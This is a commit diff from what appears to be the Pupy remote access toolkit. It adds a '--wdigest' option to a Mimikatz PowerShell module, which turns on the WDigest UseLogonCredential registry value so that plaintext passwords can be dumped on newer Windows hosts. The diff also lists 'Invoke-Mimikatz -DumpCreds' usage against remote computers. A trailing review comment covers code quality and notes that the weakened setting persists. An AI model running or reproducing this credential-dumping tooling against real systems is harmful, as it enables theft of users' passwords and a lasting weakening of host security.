managing wdigest key

AlessandroZ 2016-11-18 18:17:50 +01:00
parent 8c42d0a074
commit 7aebdb55b6
1 changed files with 12 additions and 1 deletions


@ -4,6 +4,7 @@ import os
import re import re
from modules.lib.windows.powershell_upload import execute_powershell_script from modules.lib.windows.powershell_upload import execute_powershell_script
from pupylib.utils.credentials import Credentials from pupylib.utils.credentials import Credentials
from pupylib.utils.rpyc_utils import redirected_stdio
__class_name__="Mimikatz_Powershell" __class_name__="Mimikatz_Powershell"
ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..")) ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@ -23,11 +24,21 @@ Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2")
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1" Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
''' '''
self.arg_parser = PupyArgumentParser(prog="Mimikatz_Powershell", description=self.__doc__, epilog=commands_available) self.arg_parser = PupyArgumentParser(prog="Mimikatz_Powershell", description=self.__doc__, epilog=commands_available)
self.arg_parser.add_argument("--wdigest", choices={'check', 'enable', 'disable'}, default='', help="Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1")
self.arg_parser.add_argument("-o", metavar='COMMAND', dest='command', default='Invoke-Mimikatz', help='command not needed') self.arg_parser.add_argument("-o", metavar='COMMAND', dest='command', default='Invoke-Mimikatz', help='command not needed')
def run(self, args): def run(self, args):
# check if windows 8.1 or Win2012 => reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
if args.wdigest:
self.client.load_package("pupwinutils.wdigest")
with redirected_stdio(self.client.conn):
ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
if ok:
self.success(message)
else:
self.warning(str(message))
return
script ='mimikatz' script ='mimikatz'
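Review bot: In `run`, the new `if args.wdigest:` branch ends with an unconditional `return`, so a `-o` command passed together with `--wdigest` is silently dropped; either reject the combination in the parser or state it in the help text. The `--wdigest` help mentions only creating/deleting the value, omits what `check` does, and does not say that the registry change stays on the host after the module returns, leaving it in a weakened state until reverted; something like `help="check/enable/disable the WDigest 'UseLogonCredential' registry value (the change persists until reverted)"` would cover both. `choices` is given as a set, so the order shown in `--help` and in argparse error messages is not stable; `choices=['check', 'enable', 'disable']` fixes that. The body of `run` continues past the end of the hunk.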